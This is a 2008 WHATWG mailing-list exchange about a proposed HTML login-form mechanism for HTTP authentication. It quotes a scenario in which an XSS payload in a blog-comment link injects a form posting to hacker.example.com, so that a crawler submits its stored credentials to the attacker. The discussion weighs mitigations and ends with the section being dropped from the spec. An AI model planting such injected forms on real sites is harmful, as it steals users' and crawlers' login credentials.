[whatwg] Solving the login/logout problem in HTML

Wed Nov 26 13:41:28 PST 2008

On Wed, 26 Nov 2008, Philip Taylor wrote:
> 
> If I'm not misunderstanding things, there is a new attack scenario:
> 
> I post a comment on someone's blog, saying <a 
> href="/restricted-access.php?xsshole=<form 
> action=http://hacker.example.com/capture name=login><input 
> name=username><input name=password></form>">crawl me!</a>
> 
> On their blog's web server, restricted-access.php require 
> authentication, and unauthenticated access results in a 401 with 
> 'WWW-Authenticate: HTML form="login"' and the appropriate login form. 
> But inevitably there's some kind of XSS hole in that page, so arbitrary 
> markup can be inserted above the real login form. (Maybe they pass an 
> error message in a parameter, which will be displayed above the form, 
> but they forgot to escape the output.)
> 
> Their internal search engine crawler is configured to know a username 
> and password (and the form field names etc) for these restricted areas. 
> It follows the link from my blog comment, it notices the 
> WWW-Authenticate header, and like a good little bot it chooses to parse 
> the HTML page and find the matching form and fill in the fields and 
> submit the login details. But actually it's submitting my XSS-inserted 
> form, and sending the login details to me.
> 
> XSS holes already cause various security vulnerabilities; but they can't 
> currently result in sensibly-written crawlers unwittingly submitting 
> their login details to arbitrary third parties, so this is a new risk.

Hm, this is indeed a problem.

> I can imagine a few ways to avoid this problem:
> 
>  1) Don't write any pages with XSS holes.
>  2) Detect tampering by refusing to submit login details if >= 2 forms
> match the name.
>  3) Only submit login details to same-origin URLs, or to some other
> restricted set.
>  4) Configure the crawler with the form submission URL, as well as the
> form field names and values, so it doesn't have to trust the HTML.
>  5) Change WWW-Authenticate so it gives all the details (submission
> URL, field names, etc), so nobody has to trust the HTML.
> 
> But (1) is not going to happen in reality, so we should try to minimise 
> the damage when XSS holes exist. (2) won't work because the attacker 
> could write '...?xsshole=...<!--' and the second form would be hidden. 
> (3) is more sensible; perhaps the spec should explicitly note that you 
> need to be quite careful about not submitting login forms to third-party 
> sites unless you're sure you trust them?

(3) won't work anyway, since sometimes the login form is cross-domain on 
purpose (e.g. OpenID).

> But even with (3), I could write <a
> href="/restricted-access.php?xsshole=<form
> action=/public-pastebin.php>..."> and the crawler would send the login
> details to somewhere on the same host where I could still read them
> back, which doesn't seem great.
> 
> So (4) is more sensible. You already have to configure the crawler
> with the form field names, so you might as well tell it what URL to
> submit to, and it shouldn't parse the HTML response or care about the
> <form> element. (Then there's no need for WWW-Authenticate to even say
> what the form name is.)
>
> (5) is basically the same, except it's late-binding the form details 
> rather than hardcoding them into the crawler's configuration, and so it 
> makes it easy to change the server-side login handling without 
> reconfiguring everyone's crawlers.

If we want to go with (4) or (5) then there is no need for this to be 
bound to an HTML form anymore, and we should remove it from the spec.

Is there anyone who can volunteer to edit this section as a separate spec?

I guess I'll remove this section.

-- 
Ian Hickson               U+1047E                )\._.,--....,'``.    fL
http://ln.hixie.ch/       U+263A                /,   _.. \   _\  ;`._ ,.
Things that are impossible just take longer.   `._.-(,_..'--(,_..'`-.;.'